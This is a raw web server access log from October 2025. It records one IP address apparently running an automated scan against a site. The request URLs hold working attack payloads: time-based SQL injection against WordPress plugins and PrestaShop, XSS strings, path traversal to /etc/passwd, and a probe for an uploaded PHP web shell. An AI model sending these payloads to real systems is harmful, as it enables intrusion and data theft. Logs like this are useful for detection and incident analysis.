205.185.122.202 - - [19/Oct/2025:16:25:57 +0530] "GET /wp-content/plugins/cleantalk-spam-protect/readme.txt HTTP/1.1" 404 1098
205.185.122.202 - - [19/Oct/2025:16:25:57 +0530] "GET /wp-content/plugins/cleantalk-spam-protect/readme.txt HTTP/1.1" 404 1098
205.185.122.202 - - [19/Oct/2025:16:26:24 +0530] "GET /wp-content/plugins/giveasap/readme.txt HTTP/1.1" 404 1070
205.185.122.202 - - [19/Oct/2025:16:26:25 +0530] "GET /wp-content/plugins/giveasap/readme.txt HTTP/1.1" 404 1070
205.185.122.202 - - [19/Oct/2025:16:26:36 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:16:26:36 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:16:26:40 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:16:26:40 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:16:26:44 +0530] "GET /wp-content/themes/bello/readme.txt HTTP/1.1" 404 1062
205.185.122.202 - - [19/Oct/2025:16:26:44 +0530] "GET /wp-content/themes/bello/readme.txt HTTP/1.1" 404 1062
205.185.122.202 - - [19/Oct/2025:16:26:46 +0530] "POST /wp-admin/admin-ajax.php HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:16:26:46 +0530] "POST /wp-admin/admin-ajax.php HTTP/1.1" 404 1040
204.76.203.219 - - [19/Oct/2025:16:26:47 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:16:26:48 +0530] "GET /wp-content/plugins/wp-statistics/readme.txt HTTP/1.1" 404 1080
205.185.122.202 - - [19/Oct/2025:16:26:48 +0530] "GET /wp-content/plugins/wp-statistics/readme.txt HTTP/1.1" 404 1080
205.185.122.202 - - [19/Oct/2025:16:26:52 +0530] "GET /wp-admin/admin.php?page=wps_pages_page&ID=0+AND+(SELECT+1+FROM+(SELECT(SLEEP(7)))test)&type=home HTTP/1.1" 404 1030
205.185.122.202 - - [19/Oct/2025:16:26:52 +0530] "GET /wp-admin/admin.php?page=wps_pages_page&ID=0+AND+(SELECT+1+FROM+(SELECT(SLEEP(7)))test)&type=home HTTP/1.1" 404 1030
205.185.122.202 - - [19/Oct/2025:16:26:53 +0530] "GET /?author=1 HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:16:26:53 +0530] "GET /?author=1 HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:16:27:02 +0530] "GET /wp-content/themes/jnews/readme.txt HTTP/1.1" 404 1062
205.185.122.202 - - [19/Oct/2025:16:27:02 +0530] "GET /wp-content/themes/jnews/readme.txt HTTP/1.1" 404 1062
205.185.122.202 - - [19/Oct/2025:16:27:38 +0530] "GET /?ct_mobile_keyword&ct_keyword&ct_city&ct_zipcode&search-listings=true&ct_price_from&ct_price_to&ct_beds_plus&ct_baths_plus&ct_sqft_from&ct_sqft_to&ct_lotsize_from&ct_lotsize_to&ct_year_from&ct_year_to&ct_community=%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E&ct_mls&ct_brokerage=0&lat&lng HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:16:27:39 +0530] "GET /?ct_mobile_keyword&ct_keyword&ct_city&ct_zipcode&search-listings=true&ct_price_from&ct_price_to&ct_beds_plus&ct_baths_plus&ct_sqft_from&ct_sqft_to&ct_lotsize_from&ct_lotsize_to&ct_year_from&ct_year_to&ct_community=%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E&ct_mls&ct_brokerage=0&lat&lng HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:16:27:59 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:16:28:00 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:16:28:34 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:16:28:34 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:16:28:41 +0530] "POST /wp-admin/admin-ajax.php?action=pollinsertvalues HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:16:28:41 +0530] "POST /wp-admin/admin-ajax.php?action=pollinsertvalues HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:16:29:18 +0530] "GET /?cpmvc_id=1&cpmvc_do_action=mvparse&f=edit&month_index=0&delete=1&palette=0&paletteDefault=F00&calid=1&id=999&start=a%22%3E%3Csvg/%3E%3C%22&end=a%22%3E%3Csvg/onload=alert(1)%3E%3C%22 HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:16:29:18 +0530] "GET /?cpmvc_id=1&cpmvc_do_action=mvparse&f=edit&month_index=0&delete=1&palette=0&paletteDefault=F00&calid=1&id=999&start=a%22%3E%3Csvg/%3E%3C%22&end=a%22%3E%3Csvg/onload=alert(1)%3E%3C%22 HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:16:29:37 +0530] "POST /wp-admin/admin-ajax.php HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:16:29:37 +0530] "POST /wp-admin/admin-ajax.php HTTP/1.1" 404 1040
85.12.5.59 - - [19/Oct/2025:16:29:38 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:16:29:39 +0530] "GET /wp-content/uploads/workreap-temp/34HFR4lMK69vlDgC1QMknNHAAOp.php HTTP/1.1" 404 1122
205.185.122.202 - - [19/Oct/2025:16:29:39 +0530] "GET /wp-content/uploads/workreap-temp/34HFR4lMK69vlDgC1QMknNHAAOp.php HTTP/1.1" 404 1122
85.12.5.59 - - [19/Oct/2025:16:29:44 +0530] "GET / HTTP/1.1" 200 11250
204.76.203.219 - - [19/Oct/2025:16:30:44 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:16:30:45 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:16:30:45 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:16:30:46 +0530] "POST /%7B%7Bpath%7D%7D/?key=%3Ca%3E HTTP/1.1" 404 1028
205.185.122.202 - - [19/Oct/2025:16:30:46 +0530] "POST /%7B%7Bpath%7D%7D/?key=%3Ca%3E HTTP/1.1" 404 1028
176.65.149.21 - - [19/Oct/2025:16:30:54 +0530] "GET / HTTP/1.1" 200 11250
176.65.149.21 - - [19/Oct/2025:16:31:14 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:16:31:17 +0530] "POST /wp-json/pie/v1/login HTTP/1.1" 404 1034
205.185.122.202 - - [19/Oct/2025:16:31:18 +0530] "POST /wp-json/pie/v1/login HTTP/1.1" 404 1034
205.185.122.202 - - [19/Oct/2025:16:31:29 +0530] "GET /wp-content/plugins/pie-register/readme.txt HTTP/1.1" 404 1078
205.185.122.202 - - [19/Oct/2025:16:31:29 +0530] "GET /wp-content/plugins/pie-register/readme.txt HTTP/1.1" 404 1078
205.185.122.202 - - [19/Oct/2025:16:31:31 +0530] "POST /login/ HTTP/1.1" 404 1006
205.185.122.202 - - [19/Oct/2025:16:31:31 +0530] "POST /login/ HTTP/1.1" 404 1006
205.185.122.202 - - [19/Oct/2025:16:31:34 +0530] "GET /wp-admin/profile.php HTTP/1.1" 404 1034
205.185.122.202 - - [19/Oct/2025:16:31:34 +0530] "GET /wp-admin/profile.php HTTP/1.1" 404 1034
205.185.122.202 - - [19/Oct/2025:16:31:37 +0530] "GET /wp-admin/admin-ajax.php?action=get_question&question_id=1%20AND%20(SELECT%207242%20FROM%20(SELECT(SLEEP(7)))HQYx) HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:16:31:37 +0530] "GET /wp-admin/admin-ajax.php?action=get_question&question_id=1%20AND%20(SELECT%207242%20FROM%20(SELECT(SLEEP(7)))HQYx) HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:16:32:04 +0530] "GET /forum/?subscribe_topic=1%20union%20select%201%20and%20sleep(6) HTTP/1.1" 404 1006
205.185.122.202 - - [19/Oct/2025:16:32:04 +0530] "GET /forum/?subscribe_topic=1%20union%20select%201%20and%20sleep(6) HTTP/1.1" 404 1006
205.185.122.202 - - [19/Oct/2025:16:32:44 +0530] "GET /wp-content/plugins/wc-multivendor-marketplace/readme.txt HTTP/1.1" 404 1106
205.185.122.202 - - [19/Oct/2025:16:32:44 +0530] "GET /wp-content/plugins/wc-multivendor-marketplace/readme.txt HTTP/1.1" 404 1106
205.185.122.202 - - [19/Oct/2025:16:32:52 +0530] "GET null null" 400 -
205.185.122.202 - - [19/Oct/2025:16:32:52 +0530] "GET null null" 400 -
205.185.122.202 - - [19/Oct/2025:16:33:04 +0530] "POST /wp-admin/admin.php?page=contest-gallery/index.php&users_management=true&option_id=1 HTTP/1.1" 404 1030
205.185.122.202 - - [19/Oct/2025:16:33:04 +0530] "POST /wp-admin/admin.php?page=contest-gallery/index.php&users_management=true&option_id=1 HTTP/1.1" 404 1030
205.185.122.202 - - [19/Oct/2025:16:33:27 +0530] "GET /wp-content/plugins/elementor/readme.txt HTTP/1.1" 404 1072
205.185.122.202 - - [19/Oct/2025:16:33:27 +0530] "GET /wp-content/plugins/elementor/readme.txt HTTP/1.1" 404 1072
205.185.122.202 - - [19/Oct/2025:16:33:30 +0530] "GET /wp-admin/options.php HTTP/1.1" 404 1034
205.185.122.202 - - [19/Oct/2025:16:33:30 +0530] "GET /wp-admin/options.php HTTP/1.1" 404 1034
205.185.122.202 - - [19/Oct/2025:16:33:45 +0530] "GET /wp-admin/admin-ajax.php?action=ays_sccp_results_export_file&sccp_id[]=3)%20AND%20(SELECT%205921%20FROM%20(SELECT(SLEEP(6)))LxjM)%20AND%20(7754=775&type=json HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:16:33:45 +0530] "GET /wp-admin/admin-ajax.php?action=ays_sccp_results_export_file&sccp_id[]=3)%20AND%20(SELECT%205921%20FROM%20(SELECT(SLEEP(6)))LxjM)%20AND%20(7754=775&type=json HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:16:33:59 +0530] "POST /wp-admin/admin-ajax.php?action=rtec_send_unregister_link HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:16:33:59 +0530] "POST /wp-admin/admin-ajax.php?action=rtec_send_unregister_link HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:16:34:33 +0530] "GET /wp-admin/admin-ajax.php?action=mec_load_single_page&time=1))%20UNION%20SELECT%20sleep(6)%20--%20g HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:16:34:33 +0530] "GET /wp-admin/admin-ajax.php?action=mec_load_single_page&time=1))%20UNION%20SELECT%20sleep(6)%20--%20g HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:16:36:27 +0530] "GET /wp-admin/admin.php?page=chaty-contact-form-feed&search=%3C%2Fscript%3E%3Cimg+src+onerror%3Dalert%28document.domain%29%3E HTTP/1.1" 404 1030
205.185.122.202 - - [19/Oct/2025:16:36:27 +0530] "POST /wp-admin/admin.php HTTP/1.1" 404 1030
205.185.122.202 - - [19/Oct/2025:16:36:27 +0530] "GET /wp-admin/admin.php?page=chaty-contact-form-feed&search=%3C%2Fscript%3E%3Cimg+src+onerror%3Dalert%28document.domain%29%3E HTTP/1.1" 404 1030
205.185.122.202 - - [19/Oct/2025:16:36:28 +0530] "GET /wp-content/plugins/wpcargo/includes/34HFQmA6M6tPBMNc76EOx451mX5.php HTTP/1.1" 404 1128
205.185.122.202 - - [19/Oct/2025:16:36:28 +0530] "GET /wp-content/plugins/wpcargo/includes/34HFQmA6M6tPBMNc76EOx451mX5.php HTTP/1.1" 404 1128
205.185.122.202 - - [19/Oct/2025:16:36:29 +0530] "POST /wp-admin/admin.php HTTP/1.1" 404 1030
205.185.122.202 - - [19/Oct/2025:16:36:30 +0530] "GET /wp-content/plugins/wpcargo/includes/barcode.php?text=x1x1111x1xx1xx111xx11111xx1x111x1x1x1xxx11x1111xx1x11xxxx1xx1xxxxx1x1x1xx1x1x11xx1xxxx1x11xx111xxx1xx1xx1x1x1xxx11x1111xxx1xxx1xx1x111xxx1x1xx1xxx1x1x1xx1x1x11xxx11xx1x11xx111xx1xxx1xx11x1x11x11x1111x1x11111x1x1xxxx&sizefactor=.090909090909&size=1&filepath=34HFQmA6M6tPBMNc76EOx451mX5.php HTTP/1.1" 404 1088
205.185.122.202 - - [19/Oct/2025:16:36:31 +0530] "GET /wp-content/plugins/wpcargo/includes/barcode.php?text=x1x1111x1xx1xx111xx11111xx1x111x1x1x1xxx11x1111xx1x11xxxx1xx1xxxxx1x1x1xx1x1x11xx1xxxx1x11xx111xxx1xx1xx1x1x1xxx11x1111xxx1xxx1xx1x111xxx1x1xx1xxx1x1x1xx1x1x11xxx11xx1x11xx111xx1xxx1xx11x1x11x11x1111x1x11111x1x1xxxx&sizefactor=.090909090909&size=1&filepath=34HFQmA6M6tPBMNc76EOx451mX5.php HTTP/1.1" 404 1088
205.185.122.202 - - [19/Oct/2025:16:36:34 +0530] "POST /wp-content/plugins/wpcargo/includes/34HFQmA6M6tPBMNc76EOx451mX5.php?1=var_dump HTTP/1.1" 404 1128
205.185.122.202 - - [19/Oct/2025:16:36:34 +0530] "POST /wp-content/plugins/wpcargo/includes/34HFQmA6M6tPBMNc76EOx451mX5.php?1=var_dump HTTP/1.1" 404 1128
205.185.122.202 - - [19/Oct/2025:16:37:37 +0530] "POST /wp-admin/admin-ajax.php HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:16:37:37 +0530] "POST /wp-admin/admin-ajax.php HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:16:38:09 +0530] "POST /wp-admin/admin-ajax.php HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:16:38:09 +0530] "POST /wp-admin/admin-ajax.php HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:16:38:24 +0530] "GET /?rest_route=/pmpro/v1/checkout_level&level_id=3&discount_code=%27%20%20union%20select%20sleep(6)%20--%20g HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:16:38:24 +0530] "GET /?rest_route=/pmpro/v1/checkout_level&level_id=3&discount_code=%27%20%20union%20select%20sleep(6)%20--%20g HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:16:38:26 +0530] "GET /wp-content/plugins/paid-memberships-pro/js/pmpro-checkout.js HTTP/1.1" 404 1114
205.185.122.202 - - [19/Oct/2025:16:38:26 +0530] "GET /wp-content/plugins/paid-memberships-pro/js/pmpro-checkout.js HTTP/1.1" 404 1114
205.185.122.202 - - [19/Oct/2025:16:39:25 +0530] "GET null null" 400 -
205.185.122.202 - - [19/Oct/2025:16:39:25 +0530] "GET null null" 400 -
45.142.193.27 - - [19/Oct/2025:16:39:27 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:16:39:40 +0530] "POST /run HTTP/1.1" 404 1000
205.185.122.202 - - [19/Oct/2025:16:39:42 +0530] "POST /run HTTP/1.1" 404 1000
205.185.122.202 - - [19/Oct/2025:16:39:56 +0530] "GET /nagiosxi/login.php HTTP/1.1" 404 1030
205.185.122.202 - - [19/Oct/2025:16:39:56 +0530] "GET /nagiosxi/login.php HTTP/1.1" 404 1030
205.185.122.202 - - [19/Oct/2025:16:39:56 +0530] "GET /nagiosxi/login.php HTTP/1.1" 404 1030
205.185.122.202 - - [19/Oct/2025:16:39:56 +0530] "GET /nagiosxi/login.php HTTP/1.1" 404 1030
205.185.122.202 - - [19/Oct/2025:16:39:57 +0530] "GET /nagiosxi/login.php HTTP/1.1" 404 1030
205.185.122.202 - - [19/Oct/2025:16:39:57 +0530] "GET /nagiosxi/login.php HTTP/1.1" 404 1030
205.185.122.202 - - [19/Oct/2025:16:40:02 +0530] "POST /druid/indexer/v1/sampler HTTP/1.1" 404 1042
205.185.122.202 - - [19/Oct/2025:16:40:03 +0530] "POST /druid/indexer/v1/sampler HTTP/1.1" 404 1042
205.185.122.202 - - [19/Oct/2025:16:40:04 +0530] "POST /AurallRECMonitor/services/svc-login.php HTTP/1.1" 404 1072
205.185.122.202 - - [19/Oct/2025:16:40:05 +0530] "POST /AurallRECMonitor/services/svc-login.php HTTP/1.1" 404 1072
205.185.122.202 - - [19/Oct/2025:16:40:08 +0530] "GET /nagiosxi/login.php HTTP/1.1" 404 1030
205.185.122.202 - - [19/Oct/2025:16:40:08 +0530] "GET /nagiosxi/login.php HTTP/1.1" 404 1030
205.185.122.202 - - [19/Oct/2025:16:40:10 +0530] "POST /templates/editor-preload-container HTTP/1.1" 404 1062
205.185.122.202 - - [19/Oct/2025:16:40:10 +0530] "POST /pages/createpage-entervariables.action HTTP/1.1" 404 1070
205.185.122.202 - - [19/Oct/2025:16:40:10 +0530] "POST /template/custom/content-editor HTTP/1.1" 404 1054
205.185.122.202 - - [19/Oct/2025:16:40:10 +0530] "POST /template/custom/content-editor HTTP/1.1" 404 1054
205.185.122.202 - - [19/Oct/2025:16:40:10 +0530] "POST /pages/createpage-entervariables.action?SpaceKey=x HTTP/1.1" 404 1070
205.185.122.202 - - [19/Oct/2025:16:40:10 +0530] "POST /templates/editor-preload-container HTTP/1.1" 404 1062
205.185.122.202 - - [19/Oct/2025:16:40:10 +0530] "POST /pages/createpage-entervariables.action HTTP/1.1" 404 1070
205.185.122.202 - - [19/Oct/2025:16:40:10 +0530] "POST /wiki/pages/createpage-entervariables.action HTTP/1.1" 404 1080
205.185.122.202 - - [19/Oct/2025:16:40:10 +0530] "POST /pages/doenterpagevariables.action HTTP/1.1" 404 1060
205.185.122.202 - - [19/Oct/2025:16:40:10 +0530] "POST /pages/createpage.action?spaceKey=myproj HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:16:40:10 +0530] "POST /pages/createpage-entervariables.action?SpaceKey=x HTTP/1.1" 404 1070
205.185.122.202 - - [19/Oct/2025:16:40:10 +0530] "POST /pages/doenterpagevariables.action HTTP/1.1" 404 1060
205.185.122.202 - - [19/Oct/2025:16:40:10 +0530] "POST /pages/createpage.action?spaceKey=myproj HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:16:40:10 +0530] "POST /pages/templates2/viewpagetemplate.action HTTP/1.1" 404 1074
205.185.122.202 - - [19/Oct/2025:16:40:10 +0530] "POST /confluence/pages/createpage-entervariables.action?SpaceKey=x HTTP/1.1" 404 1092
205.185.122.202 - - [19/Oct/2025:16:40:10 +0530] "POST /wiki/pages/createpage-entervariables.action?SpaceKey=x HTTP/1.1" 404 1080
205.185.122.202 - - [19/Oct/2025:16:40:10 +0530] "POST /confluence/pages/createpage-entervariables.action?SpaceKey=x HTTP/1.1" 404 1092
205.185.122.202 - - [19/Oct/2025:16:40:10 +0530] "POST /wiki/pages/createpage-entervariables.action HTTP/1.1" 404 1080
205.185.122.202 - - [19/Oct/2025:16:40:10 +0530] "POST /users/user-dark-features HTTP/1.1" 404 1042
205.185.122.202 - - [19/Oct/2025:16:40:10 +0530] "POST /confluence/pages/createpage-entervariables.action HTTP/1.1" 404 1092
205.185.122.202 - - [19/Oct/2025:16:40:10 +0530] "POST /wiki/pages/createpage-entervariables.action?SpaceKey=x HTTP/1.1" 404 1080
205.185.122.202 - - [19/Oct/2025:16:40:10 +0530] "POST /confluence/pages/createpage-entervariables.action HTTP/1.1" 404 1092
205.185.122.202 - - [19/Oct/2025:16:40:10 +0530] "POST /pages/createpage-entervariables.action HTTP/1.1" 404 1070
205.185.122.202 - - [19/Oct/2025:16:40:10 +0530] "POST /pages/createpage-entervariables.action HTTP/1.1" 404 1070
205.185.122.202 - - [19/Oct/2025:16:40:10 +0530] "POST /pages/templates2/viewpagetemplate.action HTTP/1.1" 404 1074
205.185.122.202 - - [19/Oct/2025:16:40:10 +0530] "POST /users/user-dark-features HTTP/1.1" 404 1042
205.185.122.202 - - [19/Oct/2025:16:40:22 +0530] "DELETE /dav/server.php/files/personal/GIVE_ME_ERROR_TO_GET_DOC_ROOT_2021 HTTP/1.1" 403 1004
205.185.122.202 - - [19/Oct/2025:16:40:22 +0530] "DELETE /dav/server.php/files/personal/GIVE_ME_ERROR_TO_GET_DOC_ROOT_2021 HTTP/1.1" 403 1004
205.185.122.202 - - [19/Oct/2025:16:40:27 +0530] "GET /dav/server.php/files/personal/%2e%2e/%2e%2e//%2e%2e//%2e%2e/data/settings/settings.xml HTTP/1.1" 404 1166
205.185.122.202 - - [19/Oct/2025:16:40:28 +0530] "GET /dav/server.php/files/personal/%2e%2e/%2e%2e//%2e%2e//%2e%2e/data/settings/settings.xml HTTP/1.1" 404 1166
205.185.122.202 - - [19/Oct/2025:16:40:28 +0530] "POST /webtools/control/SOAPService HTTP/1.1" 404 1050
205.185.122.202 - - [19/Oct/2025:16:40:28 +0530] "POST /webtools/control/SOAPService HTTP/1.1" 404 1050
205.185.122.202 - - [19/Oct/2025:16:40:59 +0530] "GET /misc.php?action=showpopups&type=friend HTTP/1.1" 404 1010
205.185.122.202 - - [19/Oct/2025:16:40:59 +0530] "GET /misc.php?action=showpopups&type=friend HTTP/1.1" 404 1010
205.185.122.202 - - [19/Oct/2025:16:41:19 +0530] "GET /misc.php?action=showpopups&type=friend HTTP/1.1" 404 1010
205.185.122.202 - - [19/Oct/2025:16:41:19 +0530] "GET /misc.php?action=showpopups&type=friend HTTP/1.1" 404 1010
205.185.122.202 - - [19/Oct/2025:16:41:27 +0530] "POST /patient/search_result.php HTTP/1.1" 404 1044
205.185.122.202 - - [19/Oct/2025:16:41:28 +0530] "POST /patient/search_result.php HTTP/1.1" 404 1044
205.185.122.202 - - [19/Oct/2025:16:41:47 +0530] "POST /admin/ HTTP/1.1" 404 1006
205.185.122.202 - - [19/Oct/2025:16:41:47 +0530] "POST /admin/ HTTP/1.1" 404 1006
205.185.122.202 - - [19/Oct/2025:16:41:50 +0530] "POST /contactus.php HTTP/1.1" 404 1020
205.185.122.202 - - [19/Oct/2025:16:41:50 +0530] "POST /contactus.php HTTP/1.1" 404 1020
205.185.122.202 - - [19/Oct/2025:16:42:48 +0530] "POST /contactus.php HTTP/1.1" 404 1020
205.185.122.202 - - [19/Oct/2025:16:42:48 +0530] "POST /contactus.php HTTP/1.1" 404 1020
205.185.122.202 - - [19/Oct/2025:16:42:52 +0530] "POST /contactus.php HTTP/1.1" 404 1020
205.185.122.202 - - [19/Oct/2025:16:42:52 +0530] "POST /contactus.php HTTP/1.1" 404 1020
205.185.122.202 - - [19/Oct/2025:16:43:02 +0530] "POST /contactus.php HTTP/1.1" 404 1020
205.185.122.202 - - [19/Oct/2025:16:43:03 +0530] "POST /contactus.php HTTP/1.1" 404 1020
205.185.122.202 - - [19/Oct/2025:16:43:13 +0530] "POST /api/snapshots HTTP/1.1" 404 1020
205.185.122.202 - - [19/Oct/2025:16:43:14 +0530] "POST /api/snapshots HTTP/1.1" 404 1020
205.185.122.202 - - [19/Oct/2025:16:43:25 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:16:43:25 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:16:44:02 +0530] "GET /assets/app/something/services/AppModule.class/ HTTP/1.1" 404 1086
205.185.122.202 - - [19/Oct/2025:16:44:02 +0530] "GET /assets/app/something/services/AppModule.class/ HTTP/1.1" 404 1086
205.185.122.202 - - [19/Oct/2025:16:44:14 +0530] "GET /solr/admin/cores?wt=json HTTP/1.1" 404 1026
205.185.122.202 - - [19/Oct/2025:16:44:14 +0530] "GET /solr/admin/cores?wt=json HTTP/1.1" 404 1026
205.185.122.202 - - [19/Oct/2025:16:45:13 +0530] "POST /Config/SaveUploadedHotspotLogoFile HTTP/1.1" 404 1062
205.185.122.202 - - [19/Oct/2025:16:45:13 +0530] "POST /Config/SaveUploadedHotspotLogoFile HTTP/1.1" 404 1062
205.185.122.202 - - [19/Oct/2025:16:45:53 +0530] "GET /backup2.cgi HTTP/1.1" 404 1016
205.185.122.202 - - [19/Oct/2025:16:45:54 +0530] "GET /backup2.cgi HTTP/1.1" 404 1016
205.185.122.202 - - [19/Oct/2025:16:45:57 +0530] "GET /backup2.cgi HTTP/1.1" 404 1016
205.185.122.202 - - [19/Oct/2025:16:45:58 +0530] "GET /backup2.cgi HTTP/1.1" 404 1016
205.185.122.202 - - [19/Oct/2025:16:46:01 +0530] "POST /tools.cgi HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:16:46:01 +0530] "POST /tools.cgi HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:16:46:03 +0530] "GET /log_download.cgi?type=../../etc/passwd HTTP/1.1" 404 1026
205.185.122.202 - - [19/Oct/2025:16:46:05 +0530] "GET /log_download.cgi?type=../../etc/passwd HTTP/1.1" 404 1026
205.185.122.202 - - [19/Oct/2025:16:46:05 +0530] "POST /tools.cgi HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:16:46:05 +0530] "POST /tools.cgi HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:16:46:07 +0530] "GET /log_download.cgi?type=../../etc/passwd HTTP/1.1" 404 1026
205.185.122.202 - - [19/Oct/2025:16:46:09 +0530] "GET /log_download.cgi?type=../../etc/passwd HTTP/1.1" 404 1026
205.185.122.202 - - [19/Oct/2025:16:46:14 +0530] "POST /webtools/control/SOAPService HTTP/1.1" 404 1050
205.185.122.202 - - [19/Oct/2025:16:46:14 +0530] "POST /webtools/control/SOAPService HTTP/1.1" 404 1050
205.185.122.202 - - [19/Oct/2025:16:46:55 +0530] "PATCH /redfish/v1/SessionService/ResetPassword/1/ HTTP/1.1" 501 1149
205.185.122.202 - - [19/Oct/2025:16:46:55 +0530] "PATCH /redfish/v1/SessionService/ResetPassword/1/ HTTP/1.1" 501 1149
205.185.122.202 - - [19/Oct/2025:16:47:00 +0530] "POST /redfish/v1/SessionService/Sessions/ HTTP/1.1" 404 1064
205.185.122.202 - - [19/Oct/2025:16:47:00 +0530] "POST /redfish/v1/SessionService/Sessions/ HTTP/1.1" 404 1064
205.185.122.202 - - [19/Oct/2025:16:47:10 +0530] "POST /seo/seopanel/login.php?sec=forgot HTTP/1.1" 404 1038
205.185.122.202 - - [19/Oct/2025:16:47:11 +0530] "POST /seo/seopanel/login.php?sec=forgot HTTP/1.1" 404 1038
205.185.122.202 - - [19/Oct/2025:16:47:20 +0530] "POST /nacos/v1/cs/configs?dataId=nacos.cfg.dataIdfoo&group=foo&content=helloWorld HTTP/1.1" 404 1032
205.185.122.202 - - [19/Oct/2025:16:47:20 +0530] "POST /nacos/v1/cs/configs?dataId=nacos.cfg.dataIdfoo&group=foo&content=helloWorld HTTP/1.1" 404 1032
205.185.122.202 - - [19/Oct/2025:16:47:23 +0530] "POST /nacos/v1/cs/configs?dataId=nacos.cfg.dataIdfoo&group=foo&content=helloWorld HTTP/1.1" 404 1032
205.185.122.202 - - [19/Oct/2025:16:47:24 +0530] "POST /nacos/v1/cs/configs?dataId=nacos.cfg.dataIdfoo&group=foo&content=helloWorld HTTP/1.1" 404 1032
205.185.122.202 - - [19/Oct/2025:16:47:41 +0530] "POST /webtools/control/SOAPService HTTP/1.1" 404 1050
205.185.122.202 - - [19/Oct/2025:16:47:41 +0530] "POST /webtools/control/SOAPService HTTP/1.1" 404 1050
205.185.122.202 - - [19/Oct/2025:16:48:38 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:16:48:38 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:16:48:50 +0530] "POST /index.php HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:16:48:50 +0530] "POST /index.php HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:16:48:56 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:16:48:57 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:16:48:59 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:16:48:59 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:16:49:00 +0530] "POST / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:16:49:00 +0530] "POST / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:16:49:05 +0530] "GET /appGet.cgi?hook=get_cfg_clientlist() HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:16:49:05 +0530] "GET /appGet.cgi?hook=get_cfg_clientlist() HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:16:49:06 +0530] "GET /index.php?fc=module&module=productcomments&controller=CommentGrade&id_products[]=1%20AND%20(SELECT%203875%20FROM%20(SELECT(SLEEP(8)))xoOt) HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:16:49:06 +0530] "GET /index.php?fc=module&module=productcomments&controller=CommentGrade&id_products[]=1%20AND%20(SELECT%203875%20FROM%20(SELECT(SLEEP(8)))xoOt) HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:16:49:09 +0530] "GET /module/productcomments/CommentGrade?id_products[]=1*if(now()=sysdate()%2Csleep(8)%2C0) HTTP/1.1" 404 1064
205.185.122.202 - - [19/Oct/2025:16:49:09 +0530] "GET /module/productcomments/CommentGrade?id_products[]=1*if(now()=sysdate()%2Csleep(8)%2C0) HTTP/1.1" 404 1064
